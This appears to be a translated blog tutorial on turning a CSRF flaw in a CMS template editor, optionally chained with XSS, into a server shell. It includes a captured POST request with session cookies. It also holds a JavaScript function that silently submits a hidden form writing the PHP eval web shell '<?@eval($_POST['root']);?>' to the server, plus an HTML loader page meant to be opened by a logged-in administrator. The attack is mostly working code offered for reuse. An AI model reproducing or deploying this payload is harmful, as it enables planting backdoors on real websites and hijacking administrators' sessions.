The idea: many CMSs let an administrator edit templates or other files from the admin panel. If we build an external page that submits that template-edit form on the administrator's behalf (a CSRF, chained with XSS where the CMS has one), the edit writes a file we control and gives us a shell. The same technique can do other things, such as add an administrator account.
Prerequisite: the victim must be logged on as an administrator.
If the CMS also has an XSS vulnerability, so much the better.
I found a CMS with file add/delete/edit functions to test on (this CMS also has XSS, but for various reasons it is not easy to use, so here I am just doing a test and writing an HTML page to simulate the XSS).
First, confirm that the CMS has a file-editing function; one that can add new files is best.
Then submit the form and capture the request (what matters are the parameters sent in the POST body).
Capture result:
POST /dongtai/mydecms/moban.php?action=act_add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.bkjia.com/dongtai/mydecms/moban.php?action=add
Cookie: DedeUserID=1; DedeUserID_ckMd5=enabled; DedeLoginTime=1332332156; DedeLoginTime_ckMd5=enabled; zdebuggerpresent=php,phtml,php3; PHPSESSID=Enabled
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

filename=xss&mobantext=&content=by+alex&button=%CC%ED%BC%D3%C4%A3%B0%E5%CE%C4%BC%FE&id=
Submitted URL: /dongtai/mydecms/moban.php?action=act_add
Submitted file name: filename=xss
Submitted file content: content=by+alex
Both parameters are sent in the POST body, and the server accepts them with nothing but the session cookie as proof of who is asking.
Let's construct a JavaScript POST submission (to simulate an XSS attack; otherwise a PHP or plain HTML form would do just as well).
function PostSubmit(url, data, msg) {
    var postUrl = url;     // the URL to submit to
    var postData = data;   // first field value
    var msgData = msg;     // second field value
    var ExportForm = document.createElement("FORM");
    document.body.appendChild(ExportForm);
    ExportForm.method = "POST"; // POST submission
    var newElement = document.createElement("input");
    newElement.setAttribute("name", "filename"); // file name
    newElement.setAttribute("type", "hidden");
    var newElement2 = document.createElement("input");
    newElement2.setAttribute("name", "content"); // file content
    newElement2.setAttribute("type", "hidden");
    ExportForm.appendChild(newElement);
    ExportForm.appendChild(newElement2);
    newElement.value = postData;
    newElement2.value = msgData;
    ExportForm.action = postUrl;
    ExportForm.submit();
}
// filename=test&mobantext=&content=haha&button=%CC%ED%BC%D3%C4%A3%B0%E5%CE%C4%BC%FE&id=
PostSubmit("http://www.2cto.com/dongtai/mydecms/moban.php?action=act_add", "hack", "<?@eval($_POST['root']);?>"); // then call it
Save this as test.js.
Then, if there is an XSS, you can try to load this JS through it.
I just loaded it from an HTML page for testing:
<html>
<head>
</head>
<body>
<script src="test.js">
</script>
</body>
</html>
All that remains is for the logged-on administrator to open the link we constructed,
such as: http://www.bkjia.com/xss/test.html
From: blog of a man like a dog